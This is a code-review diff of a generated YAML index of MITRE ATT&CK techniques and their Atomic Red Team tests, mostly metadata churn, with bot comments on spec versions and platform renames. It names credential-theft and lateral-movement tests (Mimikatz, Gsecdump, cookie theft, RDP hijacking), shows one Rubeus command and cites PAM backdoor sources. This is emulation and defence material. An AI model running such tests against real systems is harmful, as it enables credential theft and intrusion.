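Review bot: as with T1602.001 earlier in the diff, T1563.001 (SSH Hijacking) loses both `spec_version` and `x_mitre_attack_spec_version` and gets no replacement, while its `- root` permission entry and `x_mitre_system_requirements` are kept. Together with this object's `modified` timestamp moving back to 2020-03-23 in the preceding hunk, it looks like these two techniques are being read from an older source object; check the generator's input before merging rather than treating this as an upstream change.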
@@ -70189,7 +70871,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests:
- name: Map admin share
@@ -70314,7 +70995,7 @@ lateral-movement:
elevation_required: true
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -70341,6 +71022,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -70358,12 +71040,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
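Review bot: T1550 now lists `Identity Provider` as a platform alongside the `Office Suite` consolidation seen elsewhere in this diff; `Identity Provider` does not appear on any other object here, so if the index CSVs are generated per platform the generator's platform-to-filename mapping needs an entry for it and a new index file, otherwise this technique silently drops out of the per-platform indexes for that platform. The `x_mitre_version` bump 1.3 to 1.4 is consistent with the platform change.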
@@ -70389,14 +71071,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -70514,7 +71195,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -70568,11 +71248,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -70624,14 +71303,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests:
- name: Enable Windows Remote Management
@@ -70780,7 +71458,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests:
- name: PowerShell Lateral Movement using MMC20
@@ -70852,7 +71529,7 @@ lateral-movement:
'
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -70872,6 +71549,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -70879,7 +71557,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -70895,34 +71572,35 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
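Review bot: most of this hunk is ordering churn rather than content: the `external_references` list is reordered (CERT-EU moves from last to first, GentilKiwi moves below Campbell) and `x_mitre_modified_by_ref`, removed in the previous hunk, is re-added here. The substantive changes are small: `revoked: false` is added, `x_mitre_attack_spec_version` goes to 3.2.0, and the GentilKiwi reference now points at a web.archive.org snapshot with retrieved date September 12, 2024. Suggest having the generator emit references in a stable order (upstream order or sorted by `source_name`) so future refreshes produce reviewable diffs, and noting in the description that the original blog URL is dead, which is the only good reason to pin a citation to an archive copy.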
@@ -71028,7 +71706,7 @@ lateral-movement:
\"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" purge "
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -71053,12 +71731,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
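Review bot: the platform list for T1021.007 replaces `Office 365`, `Azure AD` and `Google Workspace` with `Office Suite` and `Identity Provider` (with the version bump to 1.1), and the same rename recurs for T1534, T1550.004, T1550.001, T1110.001, T1539 and T1110.002 below. Any per-platform index derived from this file that is keyed on the old platform names will silently lose these techniques unless it is regenerated under the new names or the old names are kept as aliases; please confirm the per-platform indexes in this PR were rebuilt from the renamed values.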
@@ -71072,13 +71749,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -71095,7 +71771,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -71143,7 +71819,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -71176,7 +71852,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
@@ -71320,7 +71995,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
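Review bot: the `modified` timestamp for T1210 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-02-24T15:06:46.006Z`, while every other technique in this diff moves forward. The `2022-05-11T14:00:00.188Z` value also appears as the old timestamp on T1556.003 and T1555.001 further down, which suggests it was a bulk-rewrite stamp; confirm that the upstream source really carries the earlier date for T1210 rather than a stale cached object being written back.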
@@ -71354,12 +72029,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
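Review bot: T1210 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place, whereas other techniques in this diff are bumped to `x_mitre_attack_spec_version: 3.2.0`. A consumer that reads `x_mitre_attack_spec_version` will now find the key missing for this one technique; if upstream genuinely has no value, the generator should emit a consistent default rather than omit the key.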
@@ -71387,10 +72060,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -71420,7 +72092,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -71482,7 +72153,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests:
- name: Exfiltration Over SMB over QUIC (New-SmbMapping)
@@ -71537,7 +72207,7 @@ lateral-movement:
elevation_required: true
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -71561,11 +72231,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -71590,9 +72259,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -71652,7 +72320,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests:
- name: RDP hijacking
@@ -71733,7 +72400,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -71921,7 +72587,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests:
- name: RDP to DomainController
@@ -72051,7 +72716,7 @@ lateral-movement:
name: command_prompt
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -72108,6 +72773,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -72118,13 +72784,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -72183,7 +72848,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -72277,49 +72941,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
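Review bot: the entire T1556.003 object is removed here and re-emitted in a different key order in the next hunk, so the diff reads as a rewrite although the content changes are limited to `modified`, `x_mitre_version`, `x_mitre_attack_spec_version`, and the `revoked`/`x_mitre_deprecated` flags. T1555.001 near the end of this diff gets the same treatment. A canonical key order in the generator (or preserving upstream order) would reduce these refreshes to a handful of changed lines. Separately, the unchanged description context shows `pam_unix.so`, `/etc/passwd` and `/etc/shadow` split onto their own lines inside a `|-` literal block, which preserves those line breaks in the rendered text; that is pre-existing, but worth a follow-up fix in the exporter.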
@@ -72334,20 +72959,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
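Review bot: `x_mitre_permissions_required: [root]` is removed from T1556.003 and nothing in the re-emitted block carries that information. If this tracks upstream ATT&CK dropping a deprecated field, the PR description should say so; otherwise the root-privilege requirement is lost for any consumer that filters techniques on `x_mitre_permissions_required`. The rest of the re-emitted block (`revoked: false`, `x_mitre_deprecated: false`, spec 3.2.0, references in their new order) matches the pattern used for the other techniques in this diff.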
@@ -72427,7 +73089,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: Input Capture
@@ -72468,7 +73129,7 @@ credential-access:
elevation_required: true
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -72497,6 +73158,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -72508,18 +73170,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -72546,9 +73208,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests:
- name: Brute Force Credentials of single Active Directory domain users via SMB
@@ -72711,7 +73370,7 @@ credential-access:
elevation_required: false
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -72835,7 +73494,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests:
- name: Gsecdump
@@ -73013,7 +73671,7 @@ credential-access:
elevation_required: false
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -73028,10 +73686,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -73039,14 +73698,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -73089,9 +73748,6 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests:
- name: Steal Firefox Cookies (Windows)
@@ -73181,7 +73837,7 @@ credential-access:
elevation_required: false
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
